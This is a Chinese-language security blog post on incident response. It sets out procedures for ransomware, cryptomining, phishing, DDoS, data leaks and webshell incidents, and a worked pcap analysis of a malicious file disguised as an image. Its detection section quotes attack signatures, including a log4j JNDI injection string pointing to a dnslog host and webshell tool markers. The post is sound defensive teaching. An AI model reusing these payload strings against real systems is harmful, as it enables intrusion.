【A9】初探应急响应

admin 2023年8月8日11:10:33评论95 views字数 2548阅读8分29秒阅读模式

“A9 Team 甲方攻防团队,成员来自某证券、微步、青藤、长亭、安全狗等公司。成员能力涉及安全运营、威胁情报、攻防对抗、渗透测试、数据安全、安全产品开发等领域,持续分享安全运营和攻防的思考和实践。”

应急响应流程上大体可以分为几个部分,包括发现告警、分析并判断类型、事件处理、关闭事件并记录处置情况。

【A9】初探应急响应


根据不同的告警事件采取不同的应急处理流程


01

勒索病毒应急流程


【A9】初探应急响应


1、隔离受感染的系统:第一步需要尽快隔离主机、停止相关文件共享、邮件等服务,防止病毒进一步传播。

2、病毒存活判断:可以创建.txt .xlsx文件看看文件是否加密,判断病毒是否存活,评估数据是否已经被加密或损坏

3、内网关联威胁资产进行终端排查、日志分析

            掌握勒索病毒影响的范围、影响程度并分析时间线

    根据最后一次可信备份的时间找出未受感染的数据备份,恢复数据

4、通过勒索文件名、邮件、文件后缀等信息,配合威胁情报中心查询

5、清除病毒,留存样本,查看是否有解密方式,恢复主机


02

挖矿病毒应急流程

【A9】初探应急响应


1、通过top命令查看CPU占用

2、根据进程定位恶意文件,通过沙箱分析恶意url和域名

3、根据判断的信息中指恶意进程

4、排查启动项、计划任务、ssh公钥、用户目录,日志并进行清理挖矿程序

5、定时监控系统资源使用情况,及时发现并处理异常情况


03

钓鱼事件的应急流程

【A9】初探应急响应


1、隔离受感染的主机,断网避免进一步传播

2、对感染的主机进行全面扫描,清除发现的恶意软件或查杀

3、对钓鱼内容进一步分析

    查看发送用户信息(邮箱、url地址、ip地址)

    排查收件用户,确定影响范围

    对附件样本、跳转地址分析

4、更改电子邮件、OA账号、媒体社交等账号密码

5、加强员工的安全教育和意识,提高对其他钓鱼攻击的识别和防范能力

04

DDoS的应对措施


1、确认遭受DDoS攻击,通过检测网络流量、服务器负载判断

2、确定来源IP并进行封禁(涉及端口、连接数、链接次数、超时、禁止时间)

3、流量重定向:将流量重定向抗D设备或云服务,以分散和吸引攻击流量,减轻对目标系统的影响

4、提高系统和网络的容错能力和负载均衡能力,以抵御DDoS攻击。


05

数据泄露的应急流程

1、确定数据泄露的范围和类型,评估风险和优先级,对事件定性,评判是否需要上报监管

    时间节点

    内部泄漏还是外部泄露

    泄漏人员、泄露源

    泄漏的数据量和敏感程度

    主动泄露还是被动泄漏

2、停止数据泄漏,采取措施保护受影响的数据

3、对涉嫌泄露数据的员工进行调查,以确定数据泄露的细节和原因。

4、若非主动泄漏,进入常规应急流程,排查流量、入侵检测类设备日志、终端日志

5、做好安全事件记录措施,按照法规留存日志不少于六个月


06

Web攻击的应急流程

【A9】初探应急响应


被植入webshell

1、隔离系统

2、通过D盾、河马等工具进行webshell查杀,对可以文件隔离

3、分析webshell,对攻击路径溯源分析

4、系统排查,后门、用户、计划任务等持计划驻留行为清理

5、web日志分析,判断事件发生时间、行为,并进行复现

6、清理并加固

常见攻击流量特征

1、Shiro攻击流量特征:Shiro550可通过key值进行流量解密,Shiro_attack-2.2工具中,若命令执行成功,响应包前后会有多个$$符号;注入内存马请求包存在密码p:pass1234及路径path:/favicondemo.ico,响应包若存在->|Success|<-则注入成功

2、Fastjson攻击流量特征:@type字段指定要加载的类,常见的带有ladp、rmi协议地址

   3、log4j流量:数据包中带有{字段,例如:${jndi:ldap://jsaoif.dnslog.cn}

4、sqlmap流量特征:user-agent带有sqlmap字段,payload模板特征

5、webshell管理工具的流量特征:菜刀请求体中存在固定数值“z0=”开头;蚁剑参数名大多以“_0x.....=”形式;冰蝎4.*版本的webshell中存在“e45e329feb5d925b”字段。


举个通过流量排查的例子:

收到流量警报,接收到远程主机发送图像为Windows可执行文件

【A9】初探应急响应

下载对应的pacp流量包进行分析,过滤并定位到请求,看到提交了个GET请求


【A9】初探应急响应

追踪此TCP流


【A9】初探应急响应


导出此jpg文件进一步分析

【A9】初探应急响应


使用shasum -a 256命令获取文件的 SHA256 哈希值


【A9】初探应急响应

获得 SHA256 哈希后,丢进公开的在线沙箱中检测,例如VirusTotal、app.any.run、微步沙箱,capesandbox等

【A9】初探应急响应

【A9】初探应急响应


可以判断为恶意软件,office文档只是一种手段,实际的恶意软件基于启用宏后检测到的EXE。
可以通过binwalk分析看到其中还包含exe文件

【A9】初探应急响应


通过foremost分离提取隐写的文件,看到存在一个png文件和恶意的exe文件。

【A9】初探应急响应


可以初步推断资产ip为10.8.4.101的用户8月4日访问aromaterapiaclinicabrasil.com.br并下载了87411326.jpg这个恶意文件,此文件本质为通过excel图标伪装的exe文件。

【A9】初探应急响应


上述常见安全攻击的应急流程,总体的需要遵循5W1H

What:了解面临什么攻击,攻击的表现形式和量级

When:了解什么时候产生的攻击事件

Who:了解谁触发了攻击,内部人员还是外部人员

Where:了解什么攻击什么位置产生,是否暴露在互联网

Why:了解为何会产生攻击行为,攻击可能造成的影响

How:根据了解初步研判事件等级


还需遵循优先保护关键资产、避害原则、易失性原则,预防为主,防范为主,及时处置,上述内容都是行为的原则,在应急加固的过程当中,还要补充技能和知识点,需要懂组件原理、掌握操作系统的工作命令和工作原理。在安全事件中,借助威胁情报驱动事件的快速响应,借助多种病毒引擎扫描检测。
九层之台,起于垒土,工具和排查点都大同小异,提升点在于响应者是否熟悉攻击特征,利用特征和行为去排查更节省应急时间。前期初学可以多在靶场实操,结合一些应急响应的场景练习,总结自己的方法论,多逛安全论坛,公众号。积累处置经验,获取安全情报不断提升。








原文始发于微信公众号(A9 Team):【A9】初探应急响应

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月8日11:10:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【A9】初探应急响应https://cn-sec.com/archives/1940296.html

发表评论

匿名网友 填写信息